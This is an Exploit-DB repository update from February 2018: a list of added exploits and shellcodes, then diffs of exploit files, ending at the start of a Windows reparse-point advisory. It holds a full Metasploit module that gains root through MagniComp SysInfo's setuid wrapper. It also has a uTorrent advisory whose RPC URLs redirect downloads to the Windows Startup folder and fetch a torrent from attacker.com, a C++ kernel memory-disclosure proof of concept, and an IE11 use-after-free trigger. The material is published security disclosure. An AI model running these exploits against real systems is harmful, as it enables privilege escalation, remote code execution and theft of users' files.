DB: 2018-02-21

8 changes to exploits/shellcodes

Easy Karaokay Player 3.3.31 - '.wav' Integer Division by Zero

Ofilter Player 1.1 - '.wav' Integer Division by Zero

Wireshark 1.10.7 - Denial of Service (PoC)

ZTE / TP-Link RomPager - Denial of Service

Exif Pilot 4.7.2 - Buffer Overflow (SEH)

InfraRecorder - '.m3u' File Buffer Overflow (PoC)

MySQL 5.5.45 - procedure analyse Function Denial of Service
Microsoft Windows Kernel - 'nt!RtlpCopyLegacyContextX86' Stack Memory Disclosure
Microsoft Internet Explorer 11 - 'Js::RegexHelper::RegexReplace' Use-After-Free

Sim Editor 6.6 - Local Stack Buffer Overflow
Microsoft Windows - Global Reparse Point Security Feature Bypass/Elevation of Privilege
Microsoft Windows - NPFS Symlink Security Feature Bypass/Elevation of Privilege/Dangerous Behavior
Microsoft Windows - Constrained Impersonation Capability Privilege Escalation
MagniComp SysInfo - mcsiwrapper Privilege Escalation (Metasploit)
Microsoft Windows - StorSvc SvcMoveFileInheritSecurity Arbitrary File Creation Privilege Escalation

utorrent - JSON-RPC Remote Code Execution / Information Disclosure

ZTE WXV10 W300 - Multiple Vulnerabilities

Moodle 2.7 - Persistent Cross-Site Scripting

D-Link DIR-615 - Multiple Vulnerabilities

CMS Made Simple 2.1.6 - Multiple Vulnerabilities

Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes)
Linux/x86 - shutdown -h now Shellcode (56 bytes)
Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (51 bytes)
Linux/x86 - shutdown -h now Shellcode (56 bytes)

Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes)

Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)

Linux/x64 - shutdown -h now Shellcode (65 bytes)

exploits/multiple/local/44150.rb

@@ -0,0 +1,166 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'MagniComp SysInfo mcsiwrapper Privilege Escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges on systems running
+        MagniComp SysInfo versions prior to 10-H64.
+
+        The .mcsiwrapper suid executable allows loading a config file using the
+        '--configfile' argument. The 'ExecPath' config directive is used to set
+        the executable load path. This module abuses this functionality to set
+        the load path resulting in execution of arbitrary code as root.
+
+        This module has been tested successfully with SysInfo version
+        10-H63 on Fedora 20 x86_64, 10-H32 on Fedora 27 x86_64, 10-H10 on
+        Debian 8 x86_64, and 10-GA on Solaris 10u11 x86.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Daniel Lawson', # Discovery and exploit
+          'Romain Trouve', # Discovery and exploit
+          'Brendan Coles'  # Metasploit
+        ],
+      'DisclosureDate' => 'Sep 23 2016',
+      'Platform'       => %w(linux solaris),
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'Targets'        =>
+        [
+          [ 'Automatic', { } ],
+          [ 'Solaris', { 'Platform' => 'solaris', 'Arch' => ARCH_X86 } ],
+          [ 'Linux', { 'Platform' => 'linux', 'Arch' => [ ARCH_X86, ARCH_X64 ]} ]
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2017-6516' ],
+          [ 'BID', '96934' ],
+          [ 'URL', 'http://www.magnicomp.com/support/cve/CVE-2017-6516.shtml' ],
+          [ 'URL', 'https://labs.mwrinfosecurity.com/advisories/magnicomps-sysinfo-root-setuid-local-privilege-escalation-vulnerability/' ],
+          [ 'URL', 'https://labs.mwrinfosecurity.com/advisories/multiple-vulnerabilities-in-magnicomps-sysinfo-root-setuid/' ]
+        ]
+    ))
+    register_options(
+      [
+        OptString.new('SYSINFO_DIR', [ true, 'Path to SysInfo directory', '/opt/sysinfo' ]),
+        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+      ])
+  end
+
+  def sysinfo_dir
+    datastore['SYSINFO_DIR']
+  end
+
+  def check
+    unless cmd_exec("test -d #{sysinfo_dir} && echo true").include? 'true'
+      vprint_good "Directory '#{sysinfo_dir}' does not exist"
+      return CheckCode::Safe
+    end
+    vprint_good "Directory '#{sysinfo_dir}' exists"
+
+    mcsiwrapper_path = "#{sysinfo_dir}/bin/.mcsiwrapper"
+    unless setuid? mcsiwrapper_path
+      vprint_error "#{mcsiwrapper_path} is not setuid"
+      return CheckCode::Safe
+    end
+    vprint_good "#{mcsiwrapper_path} is setuid"
+
+    bash_path = cmd_exec 'which bash'
+    unless bash_path.start_with?('/') && bash_path.include?('bash')
+      vprint_error 'bash is not installed. Exploitation will fail.'
+      return CheckCode::Safe
+    end
+    vprint_good 'bash is installed'
+
+    config_version = cmd_exec "grep ProdVersion= #{sysinfo_dir}/config/mcsysinfo.cfg"
+    version = config_version.scan(/^ProdVersion=(\d+-H\d+|\d+-GA)$/).flatten.first
+    if version.blank?
+      vprint_error 'Could not determine the SysInfo version'
+      return CheckCode::Detected
+    end
+    if Gem::Version.new(version.sub('-H', '.')) >= Gem::Version.new('10.64')
+      vprint_error "SysInfo version #{version} is not vulnerable"
+      return CheckCode::Safe
+    end
+    vprint_good "SysInfo version #{version} is vulnerable"
+
+    CheckCode::Vulnerable
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def mkdir(path)
+    vprint_status "Creating '#{path}' directory"
+    cmd_exec "mkdir -p #{path}"
+    register_dir_for_cleanup path
+  end
+
+  def exploit
+    check_status = check
+    if check_status != CheckCode::Vulnerable && check_status != CheckCode::Detected
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    # Set target
+    uname = cmd_exec 'uname'
+    vprint_status "Operating system is #{uname}"
+    if target.name.eql? 'Automatic'
+      case uname
+      when /SunOS/i
+        my_target = targets[1]
+      when /Linux/i
+        my_target = targets[2]
+      else
+        fail_with Failure::NoTarget, 'Unable to automatically select a target'
+      end
+    else
+      my_target = target
+    end
+    print_status "Using target: #{my_target.name}"
+
+    # Check payload
+    if (my_target['Platform'].eql?('linux') && payload_instance.name !~ /linux/i) ||
+       (my_target['Platform'].eql?('solaris') && payload_instance.name !~ /solaris/i)
+      fail_with Failure::BadConfig, "Selected payload '#{payload_instance.name}' is not compatible with target operating system '#{my_target.name}'"
+    end
+
+    # Create a working directory
+    base_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric rand(5..10)}"
+    mkdir base_path
+
+    # Write config file
+    config_path = "#{base_path}/#{rand_text_alphanumeric rand(5..10)}"
+    upload config_path, "ExecPath=#{base_path}"
+
+    # Upload payload
+    payload_name = rand_text_alphanumeric rand(5..10)
+    payload_path = "#{base_path}/#{payload_name}"
+    upload payload_path, generate_payload_exe
+    cmd_exec "chmod u+sx '#{payload_path}'"
+
+    print_status 'Executing payload...'
+
+    # Executing .mcsiwrapper directly errors:
+    #   Command ".mcsiwrapper" cannot start with `.' or contain `/'.
+    # Instead, we execute with bash to replace ARGV[0] with the payload file name
+    output = cmd_exec "bash -c \"exec -a #{payload_name} #{sysinfo_dir}/bin/.mcsiwrapper --configfile #{config_path}&\""
+    output.each_line { |line| vprint_status line.chomp }
+  end
+end

exploits/multiple/remote/44151.txt

@@ -0,0 +1,108 @@
+By default, utorrent create an HTTP RPC server on port 10000 (uTorrent classic) or 19575 (uTorrent web). There are numerous problems with these RPC servers that can be exploited by any website using XMLHTTPRequest(). To be clear, visiting *any* website is enough to compromise these applications.
+
+
+uTorrent web (http://web.utorrent.com)
+======================================
+
+As the name suggests, uTorrent Web uses a web interface and is controlled by a browser as opposed to the desktop application. By default, uTorrent web is configured to startup with Windows, so will always be running and accessible. For authentication, a random token is generated and stored in a configuration file which must be passed as a URL parameter with all requests. When you click the uTorrent tray icon, a browser window is opened with the authentication token populated, it looks like this:
+
+http://127.0.0.1:19575/gui/index.html?localauth=localapic3cfe21229a80938:
+
+While not a particularly strong secret (8 bytes of std::random_device), it at least would make remote attacks non-trivial. Unfortunately however, the authentication secret is stored inside the webroot (wtf!?!?!?!), so you can just fetch the secret and gain complete control of the service.
+
+$ curl -si http://localhost:19575/users.conf
+HTTP/1.1 200 OK
+Date: Wed, 31 Jan 2018 19:46:44 GMT
+Last-Modified: Wed, 31 Jan 2018 19:37:50 GMT
+Etag: "5a721b0e.92"
+Content-Type: text/plain
+Content-Length: 92
+Connection: close
+Accept-Ranges: bytes
+
+localapi29c802274dc61fb4        bc676961df0f684b13adae450a57a91cd3d92c03        94bc897965398c8a07ff    2       1
+
+This requires some simple dns rebinding to attack remotely, but once you have the secret you can just change the directory torrents are saved to, and then download any file anywhere writable. For example:
+
+# change the download directory to the Startup folder.
+http://127.0.0.1:19575/gui/?localauth=token:&action=setsetting&s=dir_active_download&v=C:/Users/All%20Users/Start%20Menu/Programs/Startup
+
+# download a torrent containing calc.exe
+http://127.0.0.1:19575/gui/?localauth=token:&action=add-url&url=http://attacker.com/calc.exe.torrent
+
+I wrote a working exploit for this attack, available here:
+
+http://lock.cmpxchg8b.com/Moer0kae.html
+
+The authentication secret is not the only data accessible within the webroot - settings, crashdumps, logs and other data is also accessible. As this is a complete remote compromise of the default uTorrent web configuration, I didn't bother looking any further after finding this.
+
+uTorrent Classic (https://www.utorrent.com/downloads/win)
+=========================================================
+
+By default utorrent Classic creates a JSON RPC server on port 10000, it's not clear to me that this was intentionally exposed to the web, as many endpoints crash or interfere with the UI. Here are some example actions that websites can take:
+
+http://lock.cmpxchg8b.com/utorrent-crash-test.html
+
+Nevertheless, browsing through the available endpoints I noticed that the /proxy/ handler is enabled and exposed by default, and allows any website to enumerate and copy any files you've downloaded. To be clear, any website you visit can read and copy every torrent you've downloaded. This works with the default configuration.
+
+This requires brute forcing the "sid" which is a small integer that is incremented once for each torrent, this can be brute forced in seconds.
+
+e.g.
+
+$ curl -sI 'http://localhost:10000/proxy/0/?sid=2&file=0&callback=file'
+HTTP/1.1 200 OK
+Content-Type: audio/mpeg
+Server: BitTorrentProxy/1.0
+Connection: close
+Accept-Ranges: bytes
+ETag: "8FD54C339FE8B8A418CE2299AF2EADD9B1715D7A"
+
+file is the index in a multi-file torrent (here there is just one file) and callback is a javascript callback. This means any website can find out what you've downloaded, and then just copy it from you - all the data.
+
+I made a simple demo, screenshot of how it's supposed to look attached. It's really slow, but demonstrates that a website can enumerate and read any data you've downloaded via uTorrent.
+
+
+http://lock.cmpxchg8b.com/Ahg8Aesh.html
+
+Here is how I reproduced:
+
+* On a fresh Windows 7 VM, install utorrent 3.5 (44294). Accept all default settings.
+* File -> Add torrent from URL..., enter https://archive.org/download/SKODAOCTAVIA336x280/SKODAOCTAVIA336x280_archive.torrent
+* When the torrent is finished (it's only about 5MB), visit this URL in Chrome: http://lock.cmpxchg8b.com/Ahg8Aesh.html
+* Click "Start Attack"
+* Wait a few minutes.
+
+The page should have figured out the size and file type, and gives an option to steal the files. See screenshot attached.
+
+----------
+
+The utorrent binary disables ASLR and /GS. This is a really bad idea. (Note that the binary is UPX packed, but this doesn't change any security properties).
+
+----------
+
+I noticed that utorrent is using unmodified mersenne twister to generate authentication tokens and cookies, session identifiers, pairing keys, and so on. The PRNG is seeded with GetProcessId(), GetTickCount() etc. That is already not great quality seed data, but mersenne twister makes no guarantees that someone who can view sample output can't reconstruct the state of the PRNG.
+
+This is actually one of the FAQs on the mersenne twister site:
+
+http://www.math.sci.hiroshima-u.ac.jp/~m-mat/MT/efaq.html
+
+This allows anyone to reconstruct things like pairing keys, webui session cookies, etc, etc. You can sample unlimited prng output, so this is a serious design flaw.
+
+----------
+
+Finally, a minor issue - the documentation for the "guest" account feature says many actions are disabled for security, but I tested it and that it plain isn't true:
+
+$ curl -si 'http://guest@localhost:10000/gui/?action=getsettings&callback=error&btapp='
+HTTP/1.1 200 OK
+Connection: keep-alive
+Content-Length: 16572
+Content-Type: text/javascript
+Set-Cookie: GUID=6yY1pkIHHMvvHo8tgOYu; path=/
+Cache-Control: no-cache
+
+{"build":44090,"settings": [
+["install_modification_time",0,"0",{"access":"Y"}]
+...
+
+
+Perhaps this got broken at some point, but this feature is web-accessible, so this should probably be fixed (or suitable warnings added). I can't imagine many users enabled this, but those that did probably expected the security boundaries described in the documentation to be enforced.

exploits/windows/dos/44146.cpp

@@ -0,0 +1,199 @@
+/*
+We have discovered a new Windows kernel memory disclosure vulnerability in the creation and copying of a CONTEXT structure to user-mode memory. Two previous bugs in the nearby code area were reported in issues  #1177  and  #1311 ; in fact, the problem discussed here appears to be a variant of #1177 but with a different trigger (a GetThreadContext() call instead of a generated exception).
+
+The leak was originally detected under the following stack trace:
+
+--- cut ---
+  kd> k
+   # ChildEBP RetAddr  
+  00 a5d2b8f4 81ec3e30 nt!RtlpCopyLegacyContextX86+0x16e
+  01 a5d2b91c 82218aec nt!RtlpCopyExtendedContext+0x70
+  02 a5d2b96c 8213a22a nt!RtlpWriteExtendedContext+0x66
+  03 a5d2bd18 822176bc nt!PspGetContextThreadInternal+0x1c6
+  04 a5d2bd44 81fccca7 nt!NtGetContextThread+0x54
+  05 a5d2bd44 77a41670 nt!KiSystemServicePostCall
+--- cut ---
+
+and more specifically in the copying of the _FLOATING_SAVE_AREA structure when the CONTEXT_FLOATING_POINT flags are set:
+
+--- cut ---
+  kd> dt _FLOATING_SAVE_AREA
+  ntdll!_FLOATING_SAVE_AREA
+     +0x000 ControlWord      : Uint4B
+     +0x004 StatusWord       : Uint4B
+     +0x008 TagWord          : Uint4B
+     +0x00c ErrorOffset      : Uint4B
+     +0x010 ErrorSelector    : Uint4B
+     +0x014 DataOffset       : Uint4B
+     +0x018 DataSelector     : Uint4B
+     +0x01c RegisterArea     : [80] UChar
+     +0x06c Spare0           : Uint4B
+--- cut ---
+
+In that structure, the last 32-bit "Spare0" field is left uninitialized and provided this way to the ring-3 client. The overall CONTEXT structure (which contains the FLOATING_SAVE_AREA) is allocated from the stack with an alloca() call in the nt!PspGetContextThreadInternal function:
+
+--- cut ---
+  PAGE:006BA173                 lea     edx, [ebp+var_48]
+  PAGE:006BA176                 mov     ecx, [ebp+ContextFlags]
+  PAGE:006BA179                 call    RtlGetExtendedContextLength(x,x)
+  PAGE:006BA17E                 test    eax, eax
+  PAGE:006BA180                 js      short loc_6BA140
+  PAGE:006BA182                 mov     eax, [ebp+var_48]
+  PAGE:006BA185                 call    __alloca_probe_16 <============================
+  PAGE:006BA18A                 mov     [ebp+ms_exc.old_esp], esp
+  PAGE:006BA18D                 mov     ecx, esp
+  PAGE:006BA18F                 mov     [ebp+var_54], ecx
+  PAGE:006BA192                 lea     eax, [ebp+var_4C]
+  PAGE:006BA195                 push    eax
+  PAGE:006BA196                 mov     edx, [ebp+ContextFlags]
+  PAGE:006BA199                 call    RtlInitializeExtendedContext(x,x,x)
+--- cut ---
+
+The "Spare0" field is not pre-initialized or written to by any of the routines that fill out the FLOATING_SAVE_AREA structure. As a result, running the attached proof-of-concept program (designed for Windows 10 32-bit version 1709) reveals 4 bytes of kernel stack memory at offset 0x88 of the output region (set to the 0x41 marker with stack-spraying to illustrate the problem). An example output is as follows:
+
+--- cut ---
+  00000000: 08 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000010: 00 00 00 00 00 00 00 00 00 00 00 00 7f 02 00 00 ................
+  00000020: 00 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 ................
+  00000030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000080: 00 00 00 00 00 00 00 00 41 41 41 41 00 00 00 00 ........AAAA....
+  00000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  000000a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  000000b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  000000c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  000000d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  000000e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  000000f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  000001a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  000001b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  000001c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  000001d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  000001e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  000001f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000280: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  00000290: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  000002a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  000002b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
+  000002c0: 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ................
+--- cut ---
+
+Offset 0x88 of the CONTEXT structure on x86 builds indeed corresponds to the 32-bit CONTEXT.FloatSave.Spare0 field. What's most interesting, however, is that the bug only exists on Windows 8 and 10; on Windows 7, we can see that the region obtained through alloca() is instantly zeroed-out with a memset() call:
+
+--- cut ---
+  PAGE:0065EE86                 call    RtlGetExtendedContextLength(x,x)
+  PAGE:0065EE8B                 cmp     eax, ebx
+  PAGE:0065EE8D                 jl      loc_65EFDE
+  PAGE:0065EE93                 mov     eax, [ebp+var_2C]
+  PAGE:0065EE96                 call    __alloca_probe_16
+  PAGE:0065EE9B                 mov     [ebp+ms_exc.old_esp], esp
+  PAGE:0065EE9E                 mov     [ebp+var_3C], esp
+  PAGE:0065EEA1                 push    [ebp+var_2C]    ; size_t
+  PAGE:0065EEA4                 push    ebx             ; int
+  PAGE:0065EEA5                 push    [ebp+var_3C]    ; void *
+  PAGE:0065EEA8                 call    _memset
+--- cut ---
+
+The function call is missing from Windows 8 and later systems, but we are not sure why this regression was introduced.
+
+Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
+*/
+
+#include <Windows.h>
+#include <cstdio>
+
+// For native 32-bit execution.
+extern "C"
+ULONG CDECL SystemCall32(DWORD ApiNumber, ...) {
+  __asm {mov eax, ApiNumber};
+  __asm {lea edx, ApiNumber + 4};
+  __asm {int 0x2e};
+}
+
+VOID PrintHex(PBYTE Data, ULONG dwBytes) {
+  for (ULONG i = 0; i < dwBytes; i += 16) {
+    printf("%.8x: ", i);
+
+    for (ULONG j = 0; j < 16; j++) {
+      if (i + j < dwBytes) {
+        printf("%.2x ", Data[i + j]);
+      }
+      else {
+        printf("?? ");
+      }
+    }
+
+    for (ULONG j = 0; j < 16; j++) {
+      if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
+        printf("%c", Data[i + j]);
+      }
+      else {
+        printf(".");
+      }
+    }
+
+    printf("\n");
+  }
+}
+
+VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
+  for (ULONG i = 0; i < size; i++) {
+    ptr[i] = byte;
+  }
+}
+
+VOID SprayKernelStack() {
+  // Windows 10 32-bit version 1709.
+  CONST ULONG __NR_NtGdiEngCreatePalette = 0x1296;
+
+  // Buffer allocated in static program memory, hence doesn't touch the local stack.
+  static BYTE buffer[1024];
+
+  // Fill the buffer with 'A's and spray the kernel stack.
+  MyMemset(buffer, 'A', sizeof(buffer));
+  SystemCall32(__NR_NtGdiEngCreatePalette, 1, sizeof(buffer) / sizeof(DWORD), buffer, 0, 0, 0);
+
+  // Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
+  MyMemset(buffer, 'B', sizeof(buffer));
+}
+
+int main() {
+  // Initialize the thread as GUI.
+  LoadLibrary(L"user32.dll");
+
+  CONTEXT ctx;
+  RtlZeroMemory(&ctx, sizeof(ctx));
+  ctx.ContextFlags = CONTEXT_FLOATING_POINT;
+
+  SprayKernelStack();
+
+  if (!GetThreadContext(GetCurrentThread(), &ctx)) {
+    printf("GetThreadContext failed, %d\n", GetLastError());
+    return 1;
+  }
+
+  PrintHex((PBYTE)&ctx, sizeof(ctx));
+
+  return 0;
+}

exploits/windows/dos/44153.html

@@ -0,0 +1,102 @@
+<!--
+There is a Use-after-free vulnerability in Internet Explorer that could potentially be used for memory disclosure.
+
+This was tested on IE11 running on Window 7 64-bit with the latest patches applied. Note that the PoC was tested in a 64-bit tab process via TabProcGrowth=0 registry flag and the page heap was enabled for iexplore.exe (The PoC is somewhat unreliable so applying these settings might help with reproducing).
+
+PoC:
+
+=========================================
+-->
+
+<!-- saved from url=(0014)about:internet -->
+<script>
+var vars = new Array(2);
+function main() {
+  vars[0] = Array(1000000).join(String.fromCharCode(0x41));
+  vars[1] = String.prototype.substring.call(vars[0], 1, vars[0].length);
+  String.prototype.replace.call(vars[1], RegExp(), f);
+}
+function f(arg1, arg2, arg3) {
+  alert(arg3);
+  vars[0] = 1;
+  CollectGarbage();
+  return 'a';
+}
+main();
+</script>
+
+<!--
+=========================================
+
+Debug log:
+
+=========================================
+
+(be0.c40): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+jscript9!Js::RegexHelper::RegexReplaceT<0>+0x122e5d:
+000007fe`ecc3b26d 440fb73c41      movzx   r15d,word ptr [rcx+rax*2] ds:00000000`18090022=????
+
+0:013> r
+rax=0000000000000000 rbx=0000000000000000 rcx=0000000018090022
+rdx=0000000000000001 rsi=0000000000000000 rdi=0000000000000000
+rip=000007feecc3b26d rsp=0000000011e4a590 rbp=0000000011e4a610
+ r8=fffc000000000000  r9=00000000000f423e r10=fffc000000000000
+r11=0000000000000008 r12=0000000000000000 r13=00000000148c5340
+r14=000007feec9b1240 r15=0000000000000000
+iopl=0         nv up ei ng nz ac pe cy
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010293
+jscript9!Js::RegexHelper::RegexReplaceT<0>+0x122e5d:
+000007fe`ecc3b26d 440fb73c41      movzx   r15d,word ptr [rcx+rax*2] ds:00000000`18090022=????
+
+0:013> k
+ # Child-SP          RetAddr           Call Site
+00 00000000`11e4a590 000007fe`eca1282d jscript9!Js::RegexHelper::RegexReplaceT<0>+0x122e5d
+01 00000000`11e4a9d0 000007fe`ec9b9ee3 jscript9!Js::JavascriptString::EntryReplace+0x1e6
+02 00000000`11e4aa70 000007fe`ec9b9b5d jscript9!amd64_CallFunction+0x93
+03 00000000`11e4aad0 000007fe`eca325e9 jscript9!Js::JavascriptFunction::CallFunction<1>+0x6d
+04 00000000`11e4ab10 000007fe`ec9b9ee3 jscript9!Js::JavascriptFunction::EntryCall+0xd9
+05 00000000`11e4ab70 000007fe`ecbe6e56 jscript9!amd64_CallFunction+0x93
+06 00000000`11e4abe0 000007fe`ec9bd8e0 jscript9!Js::InterpreterStackFrame::Process+0x1071
+07 00000000`11e4af20 00000000`14cc0fbb jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x386
+08 00000000`11e4b1a0 000007fe`ec9b9ee3 0x14cc0fbb
+09 00000000`11e4b1d0 000007fe`ecbe6e56 jscript9!amd64_CallFunction+0x93
+0a 00000000`11e4b220 000007fe`ec9bd8e0 jscript9!Js::InterpreterStackFrame::Process+0x1071
+0b 00000000`11e4b560 00000000`14cc0fc3 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x386
+0c 00000000`11e4b790 000007fe`ec9b9ee3 0x14cc0fc3
+0d 00000000`11e4b7c0 000007fe`ec9b9b5d jscript9!amd64_CallFunction+0x93
+0e 00000000`11e4b810 000007fe`ec9b9d2e jscript9!Js::JavascriptFunction::CallFunction<1>+0x6d
+0f 00000000`11e4b850 000007fe`ec9b9e2f jscript9!Js::JavascriptFunction::CallRootFunction+0x110
+10 00000000`11e4b930 000007fe`ec9b9d88 jscript9!ScriptSite::CallRootFunction+0x63
+11 00000000`11e4b990 000007fe`ecae3a22 jscript9!ScriptSite::Execute+0x122
+12 00000000`11e4ba20 000007fe`ecae2e75 jscript9!ScriptEngine::ExecutePendingScripts+0x208
+13 00000000`11e4bb10 000007fe`ecae4924 jscript9!ScriptEngine::ParseScriptTextCore+0x4a5
+14 00000000`11e4bc70 000007fe`e912fb61 jscript9!ScriptEngine::ParseScriptText+0xc4
+15 00000000`11e4bd20 000007fe`e912f9cb MSHTML!CActiveScriptHolder::ParseScriptText+0xc1
+16 00000000`11e4bda0 000007fe`e912f665 MSHTML!CJScript9Holder::ParseScriptText+0xf7
+17 00000000`11e4be50 000007fe`e9130a3b MSHTML!CScriptCollection::ParseScriptText+0x28c
+18 00000000`11e4bf30 000007fe`e91305be MSHTML!CScriptData::CommitCode+0x3d9
+19 00000000`11e4c100 000007fe`e9130341 MSHTML!CScriptData::Execute+0x283
+1a 00000000`11e4c1c0 000007fe`e98bfeac MSHTML!CHtmScriptParseCtx::Execute+0x101
+1b 00000000`11e4c200 000007fe`e988f02b MSHTML!CHtmParseBase::Execute+0x235
+1c 00000000`11e4c2a0 000007fe`e9111a79 MSHTML!CHtmPost::Broadcast+0x115
+1d 00000000`11e4c2e0 000007fe`e90a215f MSHTML!CHtmPost::Exec+0x4bb
+1e 00000000`11e4c4f0 000007fe`e90a20b0 MSHTML!CHtmPost::Run+0x3f
+1f 00000000`11e4c520 000007fe`e90a35ac MSHTML!PostManExecute+0x70
+20 00000000`11e4c5a0 000007fe`e90a73a3 MSHTML!PostManResume+0xa1
+21 00000000`11e4c5e0 000007fe`e909482f MSHTML!CHtmPost::OnDwnChanCallback+0x43
+22 00000000`11e4c630 000007fe`e991f74e MSHTML!CDwnChan::OnMethodCall+0x41
+23 00000000`11e4c660 000007fe`e90c7c25 MSHTML!GlobalWndOnMethodCall+0x240
+24 00000000`11e4c700 00000000`77449bbd MSHTML!GlobalWndProc+0x150
+25 00000000`11e4c780 00000000`774498c2 USER32!UserCallWinProcCheckWow+0x1ad
+26 00000000`11e4c840 000007fe`f1d91aab USER32!DispatchMessageWorker+0x3b5
+27 00000000`11e4c8c0 000007fe`f1ce59bb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555
+28 00000000`11e4fb40 000007fe`fda7572f IEFRAME!LCIETab_ThreadProc+0x3a3
+29 00000000`11e4fc70 000007fe`fa87925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f
+2a 00000000`11e4fca0 00000000`773259cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f
+2b 00000000`11e4fcf0 00000000`7755a561 kernel32!BaseThreadInitThunk+0xd
+2c 00000000`11e4fd20 00000000`00000000 ntdll!RtlUserThreadStart+0x1d
+
+=========================================
+-->

exploits/windows/local/44147.txt

@@ -0,0 +1,33 @@
+Windows: Global Reparse Point Security Feature Bypass/Elevation of Privilege
+Platform: Windows 10 1709 (functionality not present prior to this version)
+Class: Security Feature Bypass/Elevation of Privilege
+
+Summary: It’s possible to use the new Global Reparse Point functionality introduced in Windows 10 1709 to bypass the existing sandbox limitations of creating arbitrary file symbolic links.
+
+Description:
+
+Windows 10 introduced mitigations to prevent the abuse of various types of symbolic links when a process is running in a sandbox. This is a combination of outright blocking of the functionality (such as in the case of Registry Key symlinks) to doing checks on the target location so that the sandbox user can write to the location (in the case of Mount Points). 
+
